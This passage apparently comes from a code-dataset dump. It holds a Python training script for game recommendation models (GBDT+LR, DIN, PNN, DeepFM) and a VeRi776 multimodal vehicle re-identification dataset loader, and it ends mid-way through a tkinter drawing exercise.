1-0 ratio differs across gametypes, so analyze it first\ndef fun1(x):\n    return 
sum(x==1)/sum(x==0)\ndef fun2(x):\n return sum(x==1)\ndef fun3(x):\n return sum(x==0)\ndef fun4(x):\n return sum(x==1)/len(x)\ndef fun5(x, total=len(data)):\n return len(x)/total\n\ngametype_ratio = data.groupby('gametype').agg({'label':[fun1, fun2, fun3, fun4, fun5]})\ngametype_ratio.columns = ['label_1/0_rate', 'label_1_num', 'label_0_num', 'label_1_ratio', 'gametype_ratio']\n\n#gametype:[pos_ratio, gametype_ratio]\ngametype_rate_dict = {}\nfor i in zip(gametype_ratio.index, gametype_ratio.iloc[:,3].values, gametype_ratio.iloc[:,4].values):\n gametype_rate_dict[i[0]] = [i[1], i[2]]\n\nsample_nums, train_prop = len(data), 0.97\n#data = data_all\n#del data_all\ntrain_num = int(sample_nums)\n#data = data_build(data_all, sample_nums, gametype_rate_dict)\n#data = data_build(data_all_with_hist, sample_nums, app_minus_inclued=False)\n#613229个sn,即用户;48个gametype\n#len(set(list(data['sn'].values))) \n#temp_0 = data.groupby('sn').agg(len)\n\n\n############ 数据预处理\ndef entropy(label):\n \n temp_1 = np.sum([label == 1]) / len(label)\n temp_2 = 1 - temp_1\n entropy = -(temp_1*np.log(temp_1) + temp_2*np.log(temp_2))\n \n return entropy\n\n#max:0.6931471805599453\nentropy(np.array(data['label'].values)) # 0.6197236875877505\ntemp =data.groupby('gametype_hotrank_by_uid_cnt').agg({'label':entropy})\nnp.sum(temp['label'].values)/len(temp) # 0.40144343228980817\ntemp =data.groupby('gametype_hotrank_by_aid_cnt').agg({'label':entropy})\nnp.sum(temp['label'].values)/len(temp) # 0.4163850320997233\n\ngametype_num = len(set(data['gametype']))\n#发现有个含有-1,可以填充;有个9022的,出现了一个子label,即变短了,也可以填充。\ngametype_label_sp = judge_multi_feature(data, 'gametype', 'gametype_label')\n\n###### game的feature_list生成 \n#生成对应的单长度序列(one:gametype_hotrank_by_aid_cnt & gametype_hotrank_by_uid_cnt),作为两个独立的特征\nhotrank_aid_num, hotrank_aid_list, hotrank_aid_dict = one_column_inde_info(data, 'gametype_hotrank_by_aid_cnt')\nhotrank_uid_num, hotrank_uid_list, hotrank_uid_dict = one_column_inde_info(data, 'gametype_hotrank_by_uid_cnt')\n\n#或者多长度序列(multi:gametype_label)\ngametype_label_num, gametype_label_len, gametype_dict, gametype_label_list, gametype_label_dict, _ = multi_column_info(data, 'gametype_label', 'gametype', sep='::')\n\n#nlp特征\nr1 = 'p2'\nr2 = 'dout2'\n\ngametype_nlp_weight_dict = nlp_weight_dict(r1, gametype_dict)\nword2vec = nlp_wor2vec_dict(r2)\n\nword2vec_list = gametype_word2evc_list(gametype_nlp_weight_dict, word2vec, gametype_num+1)\ndel word2vec\n\n###### sn的feature_list生成 \nsn_num = len(set(data['sn']))\n#一致性检查,发现很多sn下对应multi特征并不一样,但是只需要找到其中最长的作为其特征表示即可\nsn_android_app_sp = judge_multi_feature(data, 'sn', 'android_app')\nsn_ios_app_sp = judge_multi_feature(data, 'sn', 'ios_app')\nsn_mobile_model_sp = judge_multi_feature(data, 'sn', 'mobile_model')\nsn_interest_gametype_sp = judge_multi_feature(data, 'sn', 'interest_gametype')\n\nandroid_app_num, android_app_len, sn_dict, android_app_list, android_app_dict, _ = multi_column_info(data, 'android_app', 'sn', sep='::')\nios_app_num, ios_app_len, _, ios_app_list, ios_app_dict, _ = multi_column_info(data, 'ios_app', 'sn', sep='::')\nmobile_model_num, mobile_model_len, _, mobile_model_list, mobile_model_dict, _ = multi_column_info(data, 'mobile_model', 'sn', sep='::')\ninterest_gametype_num, interest_gametype_len, _, interest_gametype_list, interest_gametype_dict, tr_list = multi_column_info(data, 'interest_gametype', 'sn', gametype_dict=gametype_dict, sep='::')\n\n\n###### model输入生成\n### train准备\nsn_list = list(data['sn'].apply(lambda x:sn_dict[x]).values)\ngametype_list = 
list(data['gametype'].apply(lambda x:gametype_dict[x]).values)\n#以interest作为hist(其他也转化hist备用)\nhist_list = [interest_gametype_list[i] for i in sn_list]\nhist_last_sequence_list = [tr_list[0][i] for i in sn_list]\npos = [tr_list[1][i] for i in sn_list]\nneg = [tr_list[2][i] for i in sn_list]\nandroid_hist_list = [android_app_list[i] for i in sn_list]\nios_hist_list = [ios_app_list[i] for i in sn_list]\nmobile_hist_list = [mobile_model_list[i] for i in sn_list]\n\nlabel = np.array(list(data['label'].values))\n#根据gametype下的gametype比例以及0-1比例设置sample_weight\nsample_weight_gametype_and_label = sample_weight_generate(gametype_rate_dict)\n\nsample_weight = []\nfor i in range(len(data)):\n temp = str(data['gametype'].iloc[i]) + str(data['label'].iloc[i])\n sample_weight.append(sample_weight_gametype_and_label[temp]) \nsample_weight = np.array(sample_weight)\n \n#构造训练集和测试集\ntrain_sample_index, test_sample_index = train_test_split(data, train_num, gametype_rate_dict)\nsample_weight_train = sample_weight[train_sample_index]\n\n# one_hist\n#同分布\nx_all = list(zip(sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list))\nx_all = np.array(x_all)\nx_train = x_all[train_sample_index].tolist()\nx_train = [list(i) for i in list(zip(*x_train))]\nx_eval = x_all[test_sample_index].tolist()\nx_eval = [list(i) for i in list(zip(*x_eval))]\ncc_train_sample = [x_train, label[train_sample_index]]\ncc_eval_sample = [x_eval, label[test_sample_index]]\n\n#尽量均衡\neval_bal_nums = 90000\n\n#data_all_1_with_hist = data_all_1[data_all_1['interest_gametype'] != '-1']\n#data_all_1_without_hist = data_all_1[data_all_1['interest_gametype'] == '-1']\n#diff_list = list(set(data_all_1['sn']).difference(set(data['sn']))) \n#in_list = list(set(sn_list))\n#in_index = [i for i in range(len(data_all_1)) if data_all_1['sn'].iloc[i] in in_list] \n#\n#temp_ratio = 1/len(gametype_rate_dict)\n#gametype_rate_dict_balance = {}\n#for i in gametype_rate_dict.keys():\n# gametype_rate_dict_balance[i] = [0.5, temp_ratio]\n# \n#data_in = data_build(data_all_1_with_hist, eval_bal_nums, gametype_rate_dict_balance)\n#del data_all_1, data_all_1_with_hist, data_all_1_without_hist\n\n_, hotrank_aid_list_in, _ = one_column_inde_info(data_in, 'gametype_hotrank_by_aid_cnt', base_dict=hotrank_aid_dict)\n_, hotrank_uid_list_in, _ = one_column_inde_info(data_in, 'gametype_hotrank_by_uid_cnt', base_dict=hotrank_uid_dict)\n_, _, _, gametype_label_list_in, _, _ = multi_column_info(data_in, 'gametype_label', 'gametype', maxlen=gametype_label_len, dict_base=gametype_label_dict)\n\n_, _, sn_dict_in, android_app_list_in,_, _ = multi_column_info(data_in, 'android_app', 'sn', maxlen=android_app_len, dict_base=android_app_dict, sep='::')\n_, _, _, ios_app_list_in, _, _ = multi_column_info(data_in, 'ios_app', 'sn', maxlen=ios_app_len, dict_base=ios_app_dict, sep='::')\n_, _, _, mobile_model_list_in, _, _ = multi_column_info(data_in, 'mobile_model', 'sn', maxlen=mobile_model_len, dict_base=mobile_model_dict, sep='::')\n_, _, _, interest_gametype_list_in, _, tr_list_in = multi_column_info(data_in, 'interest_gametype', 'sn', maxlen=interest_gametype_len, gametype_dict=gametype_dict, sep='::')\n\nsn_list_in = list(data_in['sn'].apply(lambda x:sn_dict[x] if x in sn_dict.keys() else 1).values)\ngametype_list_in = list(data_in['gametype'].apply(lambda x:gametype_dict[x] if x in gametype_dict.keys() else 1).values)\nhist_list_in = [interest_gametype_list_in[sn_dict_in[i]] for i in data_in['sn']]\nhist_last_sequence_list_in = [tr_list_in[0][sn_dict_in[i]] for i in 
data_in['sn']]\npos_in = [tr_list_in[1][sn_dict_in[i]] for i in data_in['sn']]\nneg_in = [tr_list_in[2][sn_dict_in[i]] for i in data_in['sn']]\n\nlabel_eval = np.array(list(data_in['label'].values))\nlabel_rand = np.zeros(len(label))\nlabel_eval_rand = np.zeros(len(label_eval))\n\n#length = interest_gametype_len*interest_gametype_len\n#auxiliary_index_ltr = np.array([np.tril(np.ones(interest_gametype_len, dtype='int32')) for i in range(len(sn_list))]).reshape((-1, length))\n#auxiliary_index_i = np.array([np.eye(interest_gametype_len, dtype='int32') for i in range(len(sn_list))]).reshape((-1, length))\n#auxiliary_index_ltr_in = np.array([np.tril(np.ones(interest_gametype_len, dtype='int32')) for i in range(len(sn_list_in))]).reshape((-1, length))\n#auxiliary_index_i_in = np.array([np.eye(interest_gametype_len, dtype='int32') for i in range(len(sn_list_in))]).reshape((-1, length))\n\n\nx_train = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list]\ncc_train_sample = [x_train, label, label_rand]\nx_eval = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in]\ncc_eval_sample = [x_eval, label_eval, label_eval_rand]\n\nx_train_tr = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, hist_last_sequence_list, pos, neg]\ncc_train_sample_tr = [x_train_tr, label, label_rand]\nx_eval_tr = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in, hist_last_sequence_list_in, pos_in, neg_in]\ncc_eval_sample_tr = [x_eval_tr, label_eval, label_eval_rand]\n\n# multi_hist\n#同分布\nx_all_multi = list(zip(sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, android_hist_list, ios_hist_list, mobile_hist_list))\nx_all_multi = np.array(x_all_multi)\nx_train_multi = x_all_multi[train_sample_index].tolist()\nx_train_multi = [list(i) for i in list(zip(*x_train_multi))]\nx_eval_multi = x_all_multi[test_sample_index].tolist()\nx_eval_multi = [list(i) for i in list(zip(*x_eval_multi))]\ncc_train_multi_sample = [x_train_multi, label[train_sample_index]]\ncc_eval_multi_sample = [x_eval_multi, label[test_sample_index]]\n\n#均衡\nx_train_multi = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, android_hist_list, ios_hist_list, mobile_hist_list]\ncc_train_multi_sample = [x_train_multi, label]\n\nandroid_hist_list_in = [android_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nios_hist_list_in = [ios_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nmobile_hist_list_in = [mobile_model_list_in[sn_dict_in[i]] for i in data_in['sn']]\n\nx_eval_multi = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in, android_hist_list_in, ios_hist_list_in, mobile_hist_list_in]\ncc_eval_multi_sample = [x_eval_multi, label_eval]\n\n\n### model参数\n#简单规则:train的分布区预测test\ndef fun1(x):\n return sum(x==1)/len(x)\n\ndata_dict = {}\ntemp = data.groupby('gametype').agg({'label':fun1})\ntemp.columns = ['label_1_ratio']\nfor i in zip(temp.index, temp['label_1_ratio']):\n data_dict[i[0]] = i[1]\n\ny_pred = []\nfor i in data_in['gametype']:\n if i in data_dict.keys():\n y_pred.append(data_dict[i])\n else:\n y_pred.append(0)\n \nroc_auc_score(data_in['label'], y_pred) #0.5779539111727456\n#column_count_bar(data_in, 'gametype', t='test')\n#column_count_bar(data, 'gametype', t='train')\n'''\n###### 绘制对比效果图\n\ni = 0\nfor use_Activa in use_Activas:\n# draw_epoch(cc_DIN_One[i].auc_val, 'One'+use_Activa, batch_size, train_num, record_num, i)\n# draw_epoch(cc_DIN_Multi[i].auc_val, 
'Multi'+use_Activa, batch_size, train_num, record_num, i)\n draw(cc_DIN_One[i].auc_val, cc_DIN_Multi[i].auc_val, train_num, batch_size, record_num, use_Activa, i+1) \n i += 1\n\ni = 0 \nOne_Dataframe = []\nMulti_Dataframe = []\nfor use_Activa in use_Activas:\n One_dict = {'epoch_1': cc_DIN_One[i].auc_val_item[0], 'epoch_2': cc_DIN_One[i].auc_val_item[1], 'epoch_3': cc_DIN_One[i].auc_val_item[2]}\n temp_One = pd.DataFrame(One_dict)\n temp_One.index = cc_DIN_One[i].item_val \n One_Dataframe.append(temp_One)\n \n Multi_dict = {'epoch_1': cc_DIN_Multi[i].auc_val_item[0], 'epoch_2': cc_DIN_Multi[i].auc_val_item[1], 'epoch_3': cc_DIN_Multi[i].auc_val_item[2]}\n temp_Multi = pd.DataFrame(Multi_dict)\n temp_Multi.index = cc_DIN_Multi[i].item_val \n Multi_Dataframe.append(temp_Multi)\n \n i += 1\n\n \n############ 数据过多,因此分块进行训练\n#block_size = 10\n#block_num = sample_nums // 10\n#cc_DIN_One_s = []\n#\n#for block in range(1, block_size+1):\n# cc_train_sample_temp = [[i[block_num*(block-1):block_num*block] for i in cc_train_sample[0]], cc_train_sample[1][block_num*(block-1):block_num*block]]\n#\n# if block == 1:\n# ccDIN_s = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n# android_app_num, ios_app_num, mobile_model_num, \n# android_app_list, ios_app_list, mobile_model_list,\n# gametype_label_num, gametype_label_list, use_Activa='Sigmoid')\n# \n# ccDIN_res_s = ccDIN_s.train_model(cc_train_sample_temp, cc_eval_sample, batch_size, epoch, record_num)\n# cc_DIN_One_s.append(ccDIN_res_s)\n# else:\n# ccDIN_res_s = ccDIN_s.train_model(cc_train_sample_temp, cc_eval_sample, batch_size, epoch, record_num)\n# cc_DIN_One_s.append(ccDIN_res_s)\n\n#val_all = []\n#for res in cc_DIN_One_s:\n# val_all.extend(res.auc_val )\n# \n#import matplotlib.pylab as plt\n#plt.plot(list(range(len(val_all))), val_all)\n#plt.show()\n'''\n\n#gdbt + LR\ndef generate_array(raw_list, l):\n \n res = [0] * (l+2)\n for i in raw_list:\n if i == 0:\n break\n res[i] = 1\n \n return res\n \nhotrank_aid_list_array = np.array(hotrank_aid_list, dtype='int32').reshape(-1, 1)\nhotrank_uid_list_array = np.array(hotrank_uid_list, dtype='int32').reshape(-1, 1)\ngt_array = np.array(gametype_list, dtype='int32').reshape(-1, 1)\ngtl_array = np.array([generate_array(gametype_label_list[i], gametype_label_num) for i in gametype_list], dtype='int32').reshape(-1, gametype_label_num+2)\nhist_array = np.array([generate_array(i, gametype_num) for i in hist_list], dtype='int32').reshape(-1, gametype_num+2)\nandroid_hist_array = np.array([generate_array(i, android_app_num) for i in android_hist_list], dtype='int32').reshape(-1, android_app_num+2)\nios_hist_array = np.array([generate_array(i, ios_app_num) for i in ios_hist_list], dtype='int32').reshape(-1, ios_app_num+2)\nmobile_hist_array = np.array([generate_array(i, mobile_model_num) for i in mobile_hist_list], dtype='int32').reshape(-1, mobile_model_num+2)\ngl_train = np.concatenate((hotrank_aid_list_array, hotrank_uid_list_array, gt_array, gtl_array, hist_array, android_hist_array, ios_hist_array, mobile_hist_array), axis=-1)\n\nhotrank_aid_list_array_eval = np.array(hotrank_aid_list_in, dtype='int32').reshape(-1, 1)\nhotrank_uid_list_array_eval = np.array(hotrank_uid_list_in, dtype='int32').reshape(-1, 1)\ngt_array_eval = np.array(gametype_list_in, dtype='int32').reshape(-1, 1)\ngtl_array_eval = np.array([generate_array(gametype_label_list_in[i], gametype_label_num) for i in gametype_list_in], dtype='int32').reshape(-1, 
gametype_label_num+2)\nhist_array_eval = np.array([generate_array(i, gametype_num) for i in hist_list_in], dtype='int32').reshape(-1, gametype_num+2)\nandroid_hist_list_in = [android_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nandroid_hist_array_eval = np.array([generate_array(i, android_app_num) for i in android_hist_list_in], dtype='int32').reshape(-1, android_app_num+2)\nios_hist_list_in = [ios_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nios_hist_array_eval = np.array([generate_array(i, ios_app_num) for i in ios_hist_list_in], dtype='int32').reshape(-1, ios_app_num+2)\nmobile_hist_list_in = [mobile_model_list_in[sn_dict_in[i]] for i in data_in['sn']]\nmobile_hist_array_eval = np.array([generate_array(i, mobile_model_num) for i in mobile_hist_list_in], dtype='int32').reshape(-1, mobile_model_num+2)\ngl_eval = np.concatenate((hotrank_aid_list_array_eval, hotrank_uid_list_array_eval, gt_array_eval, gtl_array_eval, hist_array_eval, android_hist_array_eval, ios_hist_array_eval, mobile_hist_array_eval), axis=-1)\n\nname = [str(i) for i in range(gl_train.shape[1])]\n\nlgb_train = lgb.Dataset(gl_train, label)\nlgb_eval = lgb.Dataset(gl_eval, label_eval, reference=lgb_train)\n\nparams = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': {'binary_logloss'},\n 'num_leaves': 6,\n 'num_trees': 200,\n 'learning_rate': 0.01,\n 'feature_fraction': 0.9,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 5,\n 'verbose': 0\n}\n\n# number of leaves,will be used in feature transformation\nnum_leaf = 6\n\nprint('Start training...')\n# train\ngbm = lgb.train(params,\n lgb_train,\n num_boost_round=100,\n valid_sets=lgb_train,\n feature_name=name,\n categorical_feature=name)\n\n#print('Save model...')\n## save model to file\n#gbm.save_model('model.txt')\n\nprint('Start predicting...')\n# predict and get data on leaves, training data\ny_pred = gbm.predict(gl_train, pred_leaf=True)\n\nprint(np.array(y_pred).shape)\nprint(y_pred[:10])\n\nprint('Writing transformed training data')\ntransformed_training_matrix = np.zeros([len(y_pred), len(y_pred[0]) * num_leaf], \\\n dtype=np.int64) # N * num_tress * num_leafs\nfor i in range(0, len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf + np.array(y_pred[i])\n transformed_training_matrix[i][temp] += 1\n\n\ny_pred = gbm.predict(gl_eval, pred_leaf=True)\nprint('Writing transformed testing data')\ntransformed_testing_matrix = np.zeros([len(y_pred), len(y_pred[0]) * num_leaf], dtype=np.int64)\nfor i in range(0, len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf + np.array(y_pred[i])\n transformed_testing_matrix[i][temp] += 1\n\n\nlm = LogisticRegression(penalty='l2', C=0.05) # logestic model construction\nlm.fit(transformed_training_matrix, label) # fitting the data\ny_pred_test = lm.predict_proba(transformed_testing_matrix) # Give the probabilty on each label\n\neval_auc = roc_auc_score(label_eval, y_pred_test)\nprint(eval_auc)\n\ntemp, batch_size, epoch, record_num, save_path = [], 64, 3, 1000, 'D:\\\\my\\\\netease_data\\\\model'\nos.chdir(save_path)\n\nccbase = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccbase_res = ccbase.train_model(cc_train_sample, cc_eval_sample, 
batch_size, epoch, record_num)\nccbase.model.save('base_model.h5')\n\nccbase_tr = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccbase_tr_res = ccbase_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccbase_tr.model.save('basetr_model.h5')\n\nccdin = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccdin_res = ccdin.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccdin.model.save('din_model.h5')\n\nccdin_tr = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccdin_tr_res = ccdin_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccdin_tr.model.save('dintr_model.h5')\n\nccpnn = ccPNN(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccpnn_res = ccpnn.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccpnn.model.save('pnn_model.h5')\n\nccpnn_tr = ccPNN(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len, weighted=True, use_Transformer=True, w=1e-12)\nccpnn_tr_res = ccpnn_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccpnn_tr.model.save('pnntr_model.h5')\n\nccdeepfm = ccdeepFM(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccdeepfm_res = ccdeepfm.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccdeepfm.model.save('deepfm_model.h5')\n\nccdeepfm_tr = ccdeepFM(sn_num, gametype_num, 
hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccdeepfm_tr_res = ccdeepfm_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccdeepfm_tr.model.save('deepfmtr_model.h5')\n\nstart, end, model = 1, 6, 'base'\nfor i in range(start, end):\n print('#'*50)\n print(i)\n print('#'*50)\n\n K.clear_session()\n ccbase = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\n ccbase_res = ccbase.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\n# np.savetxt(model + '_auc_' + str(i) + '.txt', ccbase_res.auc_val)\n \n K.clear_session()\n ccbase_tr = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\n ccbase_tr_res = ccbase_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\n# np.savetxt(model + 'tr_auc_' + str(i) + '.txt', ccbase_tr_res.auc_val)\n\n\ndraw(temp, train_num, batch_size, record_num, 'ReLU', 1, ['deepfm', 'base', 'base_tr', 'din', 'din_tr', 'pnn']) \n\n\ntemp1_mean, temp2_mean = 0, 0\nfor i in range(start, end):\n temp1 = np.loadtxt(model + '_auc_' + str(i) + '.txt')\n temp2 = np.loadtxt(model + 'tr_auc_' + str(i) + '.txt')\n temp1_mean = temp1_mean + temp1\n temp2_mean = temp2_mean + temp2\n\ntemp1_mean = temp1_mean / (end - start)\ntemp2_mean = temp2_mean / (end - start)\n\nx_index = (np.arange(len(temp1_mean))+1) / (train_num // batch_size // record_num)\nplt.plot(x_index, temp1_mean, label=model)\nplt.plot(x_index, temp2_mean, label=model+'_tr')\nplt.xlabel('epochs')\nplt.ylabel('auc')\nplt.legend()\nplt.title('The training process')\n\n\n\n\n\n","repo_name":"AcerLai/MyRS","sub_path":"lhj-master/深度推荐模型:din模型/code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":29076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8782963574","text":"# encoding: utf-8\r\n\"\"\"\r\n@author: sherlock\r\n@contact: sherlockliao01@gmail.com\r\n\"\"\"\r\n\r\nimport glob\r\nimport re\r\nimport pdb\r\nimport os\r\nimport os.path as osp\r\nimport numpy as np\r\nfrom .bases import BaseImageDataset\r\n\r\n\r\nclass VERI_MM(BaseImageDataset):\r\n \"\"\"\r\n Market1501\r\n Reference:\r\n Zheng et al. Scalable Person Re-identification: A Benchmark. 
ICCV 2015.\r\n URL: http://www.liangzheng.org/Project/project_reid.html\r\n\r\n Dataset statistics:\r\n # identities: 1501 (+1 for background)\r\n # images: 12936 (train) + 3368 (query) + 15913 (gallery)\r\n \"\"\"\r\n dataset_dir = 'image_gan'\r\n\r\n def __init__(self, root='/home/haoluo/data', verbose=True, **kwargs):\r\n super(VERI_MM, self).__init__()\r\n root = r\"F:\\datasets\\VeRi776_multimodal\"\r\n self.dataset_dir = osp.join(root, self.dataset_dir)\r\n self.train_dir = osp.join(self.dataset_dir, 'image_train')\r\n self.query_dir = osp.join(self.dataset_dir, 'image_query')\r\n self.gallery_dir = osp.join(self.dataset_dir, 'image_test')\r\n\r\n self._check_before_run()\r\n\r\n train = self._process_dir(self.train_dir, relabel=True)\r\n query = self._process_dir(self.query_dir, relabel=False)\r\n gallery = self._process_dir(self.gallery_dir, relabel=False)\r\n #pdb.set_trace()\r\n if verbose:\r\n print(\"=> RGB_IR loaded\")\r\n self.print_dataset_statistics(train, query, gallery)\r\n\r\n self.train = train\r\n self.query = query\r\n self.gallery = gallery\r\n\r\n self.num_train_pids, self.num_train_imgs, self.num_train_cams = self.get_imagedata_info(self.train)\r\n self.num_query_pids, self.num_query_imgs, self.num_query_cams = self.get_imagedata_info(self.query)\r\n self.num_gallery_pids, self.num_gallery_imgs, self.num_gallery_cams = self.get_imagedata_info(self.gallery)\r\n\r\n print(\"veri776 multimodal version used as dataset! => {}\".format(self.dataset_dir))\r\n #pdb.set_trace()\r\n\r\n def _check_before_run(self):\r\n \"\"\"Check if all files are available before going deeper\"\"\"\r\n if not osp.exists(self.dataset_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.dataset_dir))\r\n if not osp.exists(self.train_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.train_dir))\r\n if not osp.exists(self.query_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.query_dir))\r\n if not osp.exists(self.gallery_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.gallery_dir))\r\n\r\n def _process_dir(self, dir_path, relabel=False):\r\n imgs = glob.glob(osp.join(dir_path, '*.jpg'))\r\n pattern = re.compile(r'([-\\d]+)_c([-\\d]+)')\r\n\r\n pid_container = set()\r\n for img in imgs:\r\n pid, _ = map(int, pattern.search(img).groups())\r\n if pid == -1: continue # junk images are just ignored\r\n pid_container.add(pid)\r\n pid2label = {pid: label for label, pid in enumerate(pid_container)}\r\n\r\n dataset = []\r\n for img in imgs:\r\n pid, camid = map(int, pattern.search(img).groups())\r\n #pdb.set_trace()\r\n #if pid == -1: continue # junk images are just ignored\r\n assert 1 <= pid <= 776 # pid == 0 means background\r\n assert 1 <= camid <= 20\r\n camid -= 1 # index starts from 0\r\n if relabel: pid = pid2label[pid]\r\n\r\n r_path = osp.join(dir_path, img)\r\n n_path = osp.join(dir_path+\"_n\", img)\r\n t_path = osp.join(dir_path+\"_t\", img)\r\n\r\n dataset.append(((r_path, n_path, t_path), pid, 0, camid))\r\n return dataset\r\n\r\n","repo_name":"superlollipop123/Cross-directional-Center-Network-and-MSVR310","sub_path":"data/datasets/veri_mm.py","file_name":"veri_mm.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"27028892129","text":"from tkinter import *\n\nroot = Tk()\n\ncanvas = Canvas(root, width='300', height='300')\ncanvas.pack()\n\n# create a square drawing function that takes 2 parameters:\n# the square size, 
